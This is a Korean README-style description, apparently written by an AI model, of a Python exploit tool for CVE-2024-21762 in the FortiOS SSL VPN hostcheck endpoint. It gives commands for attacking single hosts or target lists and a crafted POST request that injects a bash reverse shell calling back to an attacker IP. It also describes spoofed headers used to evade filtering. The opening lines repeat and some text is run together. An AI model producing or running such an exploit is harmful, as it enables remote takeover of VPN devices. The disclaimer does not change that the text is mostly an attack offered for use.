
개념 증명 스캐너로 FortiOS SSL VPN의 `/remote/hostcheck_validate` 엔드포인트에서 CVE-2024-21762를 대상으로 하며 리버스 셸 페이로드 전달을 포함합니다.
CVE-2024-21762를 대상으로 하는 개념 증명 스캐너로, FortiOS SSL VPN의 /remote/hostcheck_validate 엔드포인트를 겨냥하며 리버스 셸 페이로드를 전달합니다.
다음은 프로젝트에 대한 GitHub 스타일의 요약으로, 깔끔하고 간결한 설명, 사용법 안내, CVE와의 연관성에 대한 맥락을 포함합니다.
CVE-2024-21762 FortiOS HostCheck PoC ScannerCVE-2024-21762를 대상으로 하는 개념 증명 스캐너로, FortiOS SSL VPN의
/remote/hostcheck_validate엔드포인트를 겨냥하며 리버스 셸 페이로드를 전달합니다.
이 Python 스크립트는 Fortinet의 FortiOS SSL VPN 인터페이스와 상호작용하도록 설계된 PoC(Proof of Concept) 도구로, /remote/hostcheck_validate 엔드포인트의 스택 기반 버퍼 오버플로우 또는 명령 주입 취약점인 CVE-2024-21762를 대상으로 합니다.
면책 조항: 이 도구는 교육 및 승인된 테스트 목적으로만 사용해야 합니다.
/remote/hostcheck_validate에 조작된 POST 요청을 전송합니다.host)에 bash 리버스 셸 페이로드를 주입합니다.User-Agent, Cookie)를 사용하여 표면적인 FortiOS 요청 필터링을 우회합니다.last_response.txt)tqdm의존성 설치:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: IP:PORT 형식의 대상 목록, 한 줄에 하나씩results.txt: 익스플로잇 시도 출력 로그POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
도구는 각 시도의 전체 HTTP 응답을 다음 파일에 기록합니다:
last_response.txt
이 파일을 사용하여 요청이 구문 분석되었는지, 거부되었는지, 또는 오류 코드가 반환되었는지 확인할 수 있습니다.
이 코드는 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하거나 명시적 테스트 권한이 없는 네트워크나 시스템에서는 사용하지 마십시오.
Carter — 사이버보안 엔지니어, Red/Purple Team 애호가, PoC 자동화 괴짜.
이 내용을 GitHub에 푸시할 준비가 된 README.md 파일 + 저장소 구조로 패키징하시겠습니까? 다음에 생성해 드릴 수 있습니다.